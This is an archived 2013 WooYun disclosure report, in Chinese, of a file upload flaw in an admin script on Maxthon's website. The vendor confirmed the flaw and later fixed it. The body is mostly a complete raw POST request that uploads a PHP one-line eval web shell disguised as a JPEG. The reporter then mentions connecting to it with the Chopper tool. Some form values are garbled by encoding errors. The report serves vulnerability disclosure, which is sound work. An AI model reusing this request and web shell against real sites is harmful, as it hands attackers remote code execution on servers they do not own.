乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-09-09: 细节已通知厂商并且等待厂商处理中 2013-09-09: 厂商已经确认,细节仅向厂商公开 2013-09-19: 细节向核心白帽子及相关领域专家公开 2013-09-29: 细节向普通白帽子公开 2013-10-09: 细节向实习白帽子公开 2013-10-24: 细节向公众公开
遨游某某站点一隐秘文件上传漏洞(以shell)
漏洞站点:遨游官网漏洞页面:http://www.maxthon.cn/admin/admincp.phpPOST上传信息:
POST /admin/admincp.php HTTP/1.1Content-Length: 1337Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_IUFVIUXVAHCookie: PHPSESSID=3b72s3keeokhdmh75123clseq3; cdb_collapse=%5B22%5D%5B22%5D%5B23%5D%5B20%5D%5B21%5D%5B21%5D%5B23%5D%5B25%5D%5B26%5D%5B26%5D%5B24%5D%5B24%5D%5B25%5D%5B7%5D%5B7%5D%5B11%5D%5B4%5D%5B4%5D%5B19%5D%5B19%5D%5B20%5D%5B11%5D%5B18%5D%5B18%5DHost: www.maxthon.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept: */*-------AcunetixBoundary_IUFVIUXVAHContent-Disposition: form-data; name="action"pifu-------AcunetixBoundary_IUFVIUXVAHContent-Disposition: form-data; name="do"sel_del-------AcunetixBoundary_IUFVIUXVAHContent-Disposition: form-data; name="does"upd-------AcunetixBoundary_IUFVIUXVAHContent-Disposition: form-data; name="pf_apple"v3.1.5-------AcunetixBoundary_IUFVIUXVAHContent-Disposition: form-data; name="pf_author"MOâ¢57-------AcunetixBoundary_IUFVIUXVAHContent-Disposition: form-data; name="pf_file2"ç®è.rar-------AcunetixBoundary_IUFVIUXVAHContent-Disposition: form-data; name="pf_name"è²å½©åå£ -å¤â¢-------AcunetixBoundary_IUFVIUXVAHContent-Disposition: form-data; name="pf_pic2"ç®è.png-------AcunetixBoundary_IUFVIUXVAHContent-Disposition: form-data; name="pf_type"1-------AcunetixBoundary_IUFVIUXVAHContent-Disposition: form-data; name="sub_add_upd"ä¿å-------AcunetixBoundary_IUFVIUXVAHContent-Disposition: form-data; name="tj"1-------AcunetixBoundary_IUFVIUXVAHContent-Disposition: form-data; name="upd_id"21-------AcunetixBoundary_IUFVIUXVAHContent-Disposition: form-data; name="pf_file"; filename="test.php"Content-Type: image/jpeg<?php @eval($_POST['testtest']);?>-------AcunetixBoundary_IUFVIUXVAH--
上传了一个名字为test.php的一句话。页面地址:
用菜刀连接:
不愿继续了,到此结束.......(求礼物呀呀!!!:)
。。。。。
危害等级:中
漏洞Rank:10
确认时间:2013-09-09 14:34
感謝通知漏洞.
2013-10-22:已修复